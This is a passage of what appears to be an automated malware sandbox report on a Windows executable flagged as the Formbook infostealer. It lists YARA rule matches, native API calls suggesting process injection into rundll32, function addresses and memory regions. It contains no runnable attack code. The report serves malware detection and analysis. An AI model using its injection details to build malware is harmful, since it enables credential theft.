Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004181B0 NtCreateFile, 1_2_004181B0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00418260 NtReadFile, 1_2_00418260
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004182E0 NtClose, 1_2_004182E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00418390 NtAllocateVirtualMemory, 1_2_00418390
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041825A NtReadFile, 1_2_0041825A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004182DA NtClose, 1_2_004182DA
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041838B NtAllocateVirtualMemory, 1_2_0041838B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_00A498F0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_00A49860
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49840 NtDelayExecution,LdrInitializeThunk, 1_2_00A49840
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A499A0 NtCreateSection,LdrInitializeThunk, 1_2_00A499A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_00A49910
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A20 NtResumeThread,LdrInitializeThunk, 1_2_00A49A20
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_00A49A00
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A50 NtCreateFile,LdrInitializeThunk, 1_2_00A49A50
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A495D0 NtClose,LdrInitializeThunk, 1_2_00A495D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49540 NtReadFile,LdrInitializeThunk, 1_2_00A49540
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_00A496E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_00A49660
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00A497A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00A49780
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49FE0 NtCreateMutant,LdrInitializeThunk, 1_2_00A49FE0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49710 NtQueryInformationToken,LdrInitializeThunk, 1_2_00A49710
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A498A0 NtWriteVirtualMemory, 1_2_00A498A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49820 NtEnumerateKey, 1_2_00A49820
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4B040 NtSuspendThread, 1_2_00A4B040
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A499D0 NtCreateProcessEx, 1_2_00A499D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49950 NtQueueApcThread, 1_2_00A49950
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A80 NtOpenDirectoryObject, 1_2_00A49A80
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A10 NtQuerySection, 1_2_00A49A10
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4A3B0 NtGetContextThread, 1_2_00A4A3B0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49B00 NtSetValueKey, 1_2_00A49B00
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A495F0 NtQueryInformationFile, 1_2_00A495F0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49520 NtWaitForSingleObject, 1_2_00A49520
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4AD30 NtSetContextThread, 1_2_00A4AD30
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49560 NtWriteFile, 1_2_00A49560
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A496D0 NtCreateKey, 1_2_00A496D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49610 NtEnumerateValueKey, 1_2_00A49610
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49670 NtQueryInformationProcess, 1_2_00A49670
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49650 NtQueryValueKey, 1_2_00A49650
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49730 NtQueryVirtualMemory, 1_2_00A49730
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4A710 NtOpenProcessToken, 1_2_00A4A710
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49760 NtOpenProcess, 1_2_00A49760
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49770 NtSetInformationFile, 1_2_00A49770
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4A770 NtOpenThread, 1_2_00A4A770
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_004181B0 NtCreateFile, 1_1_004181B0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00418260 NtReadFile, 1_1_00418260
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_004182E0 NtClose, 1_1_004182E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00418390 NtAllocateVirtualMemory, 1_1_00418390
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041825A NtReadFile, 1_1_0041825A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_004182DA NtClose, 1_1_004182DA
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041838B NtAllocateVirtualMemory, 1_1_0041838B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649540 NtReadFile,LdrInitializeThunk, 6_2_04649540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046495D0 NtClose,LdrInitializeThunk, 6_2_046495D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_04649660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649650 NtQueryValueKey,LdrInitializeThunk, 6_2_04649650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046496E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_046496E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046496D0 NtCreateKey,LdrInitializeThunk, 6_2_046496D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649710 NtQueryInformationToken,LdrInitializeThunk, 6_2_04649710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649FE0 NtCreateMutant,LdrInitializeThunk, 6_2_04649FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649780 NtMapViewOfSection,LdrInitializeThunk, 6_2_04649780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_04649860
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649840 NtDelayExecution,LdrInitializeThunk, 6_2_04649840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_04649910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046499A0 NtCreateSection,LdrInitializeThunk, 6_2_046499A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A50 NtCreateFile,LdrInitializeThunk, 6_2_04649A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649560 NtWriteFile, 6_2_04649560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649520 NtWaitForSingleObject, 6_2_04649520
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464AD30 NtSetContextThread, 6_2_0464AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046495F0 NtQueryInformationFile, 6_2_046495F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649670 NtQueryInformationProcess, 6_2_04649670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649610 NtEnumerateValueKey, 6_2_04649610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649760 NtOpenProcess, 6_2_04649760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464A770 NtOpenThread, 6_2_0464A770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649770 NtSetInformationFile, 6_2_04649770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649730 NtQueryVirtualMemory, 6_2_04649730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464A710 NtOpenProcessToken, 6_2_0464A710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046497A0 NtUnmapViewOfSection, 6_2_046497A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464B040 NtSuspendThread, 6_2_0464B040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649820 NtEnumerateKey, 6_2_04649820
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046498F0 NtReadVirtualMemory, 6_2_046498F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046498A0 NtWriteVirtualMemory, 6_2_046498A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649950 NtQueueApcThread, 6_2_04649950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046499D0 NtCreateProcessEx, 6_2_046499D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A20 NtResumeThread, 6_2_04649A20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A00 NtProtectVirtualMemory, 6_2_04649A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A10 NtQuerySection, 6_2_04649A10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A80 NtOpenDirectoryObject, 6_2_04649A80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649B00 NtSetValueKey, 6_2_04649B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464A3B0 NtGetContextThread, 6_2_0464A3B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB82E0 NtClose, 6_2_02BB82E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB8260 NtReadFile, 6_2_02BB8260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB8390 NtAllocateVirtualMemory, 6_2_02BB8390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB81B0 NtCreateFile, 6_2_02BB81B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB82DA NtClose, 6_2_02BB82DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB825A NtReadFile, 6_2_02BB825A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB838B NtAllocateVirtualMemory, 6_2_02BB838B
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040314A
Detected potential crypto function
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_004046A7 0_2_004046A7
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B8B4 1_2_0041B8B4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041C1CB 1_2_0041C1CB
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00401208 1_2_00401208
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041C3FC 1_2_0041C3FC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041CB99 1_2_0041CB99
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00408C4B 1_2_00408C4B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00408C50 1_2_00408C50
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041C544 1_2_0041C544
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B611 1_2_0041B611
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD20A8 1_2_00AD20A8
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1B090 1_2_00A1B090
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD28EC 1_2_00AD28EC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ADE824 1_2_00ADE824
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1002 1_2_00AC1002
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120 1_2_00A24120
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0F900 1_2_00A0F900
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD22AE 1_2_00AD22AE
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABFA2B 1_2_00ABFA2B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3EBB0 1_2_00A3EBB0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC03DA 1_2_00AC03DA
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACDBD2 1_2_00ACDBD2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD2B28 1_2_00AD2B28
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1841F 1_2_00A1841F
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACD466 1_2_00ACD466
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32581 1_2_00A32581
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1D5E0 1_2_00A1D5E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD25DD 1_2_00AD25DD
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A00D20 1_2_00A00D20
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD2D07 1_2_00AD2D07
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD1D55 1_2_00AD1D55
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD2EF7 1_2_00AD2EF7
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A26E30 1_2_00A26E30
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACD616 1_2_00ACD616
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD1FF1 1_2_00AD1FF1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ADDFCE 1_2_00ADDFCE
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00401030 1_1_00401030
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B8B4 1_1_0041B8B4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041C1CB 1_1_0041C1CB
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00401208 1_1_00401208
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041C3FC 1_1_0041C3FC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041CB99 1_1_0041CB99
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00408C4B 1_1_00408C4B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00408C50 1_1_00408C50
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041C544 1_1_0041C544
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00402D90 1_1_00402D90
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B611 1_1_0041B611
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00402FB0 1_1_00402FB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CD466 6_2_046CD466
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461841F 6_2_0461841F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D1D55 6_2_046D1D55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04600D20 6_2_04600D20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D2D07 6_2_046D2D07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461D5E0 6_2_0461D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D25DD 6_2_046D25DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632581 6_2_04632581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04626E30 6_2_04626E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CD616 6_2_046CD616
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D2EF7 6_2_046D2EF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D1FF1 6_2_046D1FF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046DDFCE 6_2_046DDFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046DE824 6_2_046DE824
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1002 6_2_046C1002
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D28EC 6_2_046D28EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D20A8 6_2_046D20A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B090 6_2_0461B090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 6_2_04624120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460F900 6_2_0460F900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D22AE 6_2_046D22AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D2B28 6_2_046D2B28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C03DA 6_2_046C03DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CDBD2 6_2_046CDBD2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463EBB0 6_2_0463EBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBCB99 6_2_02BBCB99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC3FC 6_2_02BBC3FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC1AF 6_2_02BBC1AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC1CB 6_2_02BBC1CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BA2FB0 6_2_02BA2FB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BA8C50 6_2_02BA8C50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BA8C4B 6_2_02BA8C4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BA2D90 6_2_02BA2D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC544 6_2_02BBC544
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: String function: 00419F60 appears 38 times
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: String function: 00A0B150 appears 45 times
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: String function: 0041A090 appears 40 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0460B150 appears 35 times
Sample file is different than original file name gathered from version info
Source: NdBLyH2h5d.exe, 00000000.00000003.211607404.000000001EF66000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NdBLyH2h5d.exe
Source: NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NdBLyH2h5d.exe
Source: NdBLyH2h5d.exe, 00000001.00000002.253177072.000000000264C000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs NdBLyH2h5d.exe
Uses 32bit PE files
Source: NdBLyH2h5d.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
